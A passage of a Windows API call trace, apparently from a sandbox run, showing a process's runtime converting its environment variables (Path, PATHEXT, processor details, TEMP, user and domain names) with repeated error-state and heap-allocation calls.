(dwErrCode=0x0) [0081.359] GetLastError () returned 0x0 [0081.359] SetLastError (dwErrCode=0x0) [0081.359] GetLastError () returned 0x0 [0081.359] SetLastError (dwErrCode=0x0) [0081.359] GetLastError () returned 0x0 [0081.359] SetLastError (dwErrCode=0x0) [0081.359] GetLastError () returned 0x0 [0081.359] SetLastError (dwErrCode=0x0) [0081.359] GetLastError () returned 0x0 [0081.359] SetLastError (dwErrCode=0x0) [0081.359] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.360] SetLastError (dwErrCode=0x0) [0081.360] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721640) returned 0x34 [0081.361] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721640, Size=0x38) returned 0x721640 [0081.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0081.361] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xe) returned 0x7131d8 [0081.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x7131d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0081.361] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] GetLastError () returned 0x0 [0081.361] SetLastError (dwErrCode=0x0) [0081.361] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.362] SetLastError (dwErrCode=0x0) [0081.362] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.363] SetLastError (dwErrCode=0x0) [0081.363] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.364] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721640) returned 0x38 [0081.364] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721640, Size=0x3c) returned 0x7216a0 [0081.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0081.364] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x95) returned 0x7216e8 [0081.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x7216e8, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0081.364] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.364] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.364] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.364] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.364] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.364] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.364] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.364] GetLastError () returned 0x0 [0081.364] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.365] GetLastError () returned 0x0 [0081.365] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] GetLastError () returned 0x0 [0081.366] SetLastError (dwErrCode=0x0) [0081.366] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x7216a0) returned 0x3c [0081.366] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7216a0, Size=0x40) returned 0x7216a0 [0081.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0081.366] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3e) returned 0x712550 [0081.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x712550, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0081.366] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.367] SetLastError (dwErrCode=0x0) [0081.367] GetLastError () returned 0x0 [0081.368] SetLastError (dwErrCode=0x0) [0081.368] GetLastError () returned 0x0 [0081.368] SetLastError (dwErrCode=0x0) [0081.368] GetLastError () returned 0x0 [0081.368] SetLastError (dwErrCode=0x0) [0081.368] GetLastError () returned 0x0 [0081.368] SetLastError (dwErrCode=0x0) [0081.368] GetLastError () returned 0x0 [0081.368] SetLastError (dwErrCode=0x0) [0081.368] GetLastError () returned 0x0 [0081.368] SetLastError (dwErrCode=0x0) [0081.368] GetLastError () returned 0x0 [0081.368] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x7216a0) returned 0x40 [0081.368] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7216a0, Size=0x44) returned 0x721788 [0081.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0081.368] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1b) returned 0x71eb70 [0081.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x71eb70, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0081.368] GetLastError () returned 0x0 [0081.368] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x44 [0081.368] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x48) returned 0x721788 [0081.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0081.368] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1d) returned 0x71eb98 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x71eb98, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0081.369] GetLastError () returned 0x0 [0081.369] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x48 [0081.369] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x4c) returned 0x721788 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0081.369] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x48) returned 0x716e30 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x716e30, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0081.369] GetLastError () returned 0x0 [0081.369] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x4c [0081.369] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x50) returned 0x721788 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0081.369] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x12) returned 0x721640 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x721640, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0081.369] GetLastError () returned 0x0 [0081.369] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x50 [0081.369] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x54) returned 0x721788 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0081.369] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x18) returned 0x721660 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x721660, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0081.369] GetLastError () returned 0x0 [0081.369] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x54 [0081.369] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x58) returned 0x721788 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0081.369] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1b) returned 0x71ebc0 [0081.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x71ebc0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0081.370] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x58 [0081.370] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x5c) returned 0x721788 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0081.370] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x24) returned 0x71ad60 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x71ad60, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0081.370] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x5c [0081.370] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x60) returned 0x721788 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0081.370] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x29) returned 0x71b470 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x71b470, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0081.370] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x60 [0081.370] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x64) returned 0x721788 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0081.370] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1e) returned 0x71ebe8 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x71ebe8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0081.370] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x64 [0081.370] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x68) returned 0x721788 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0081.370] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x6b) returned 0x7217f8 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x7217f8, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0081.370] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721788) returned 0x68 [0081.370] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721788, Size=0x6c) returned 0x721870 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0081.370] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x17) returned 0x7216a0 [0081.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x7216a0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0081.371] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x6c [0081.371] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x70) returned 0x721870 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0081.371] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xf) returned 0x7131f0 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x7131f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0081.371] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x70 [0081.371] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x74) returned 0x721870 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0081.371] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x16) returned 0x7216c0 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7216c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0081.371] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x74 [0081.371] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x78) returned 0x721870 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0081.371] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2a) returned 0x71b4a8 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x71b4a8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0081.371] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x78 [0081.371] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x7c) returned 0x721870 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0081.371] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x29) returned 0x71b4e0 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x71b4e0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0081.371] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x7c [0081.371] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x80) returned 0x721870 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0081.371] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x16) returned 0x721788 [0081.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x721788, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0081.372] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x80 [0081.372] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x84) returned 0x721870 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 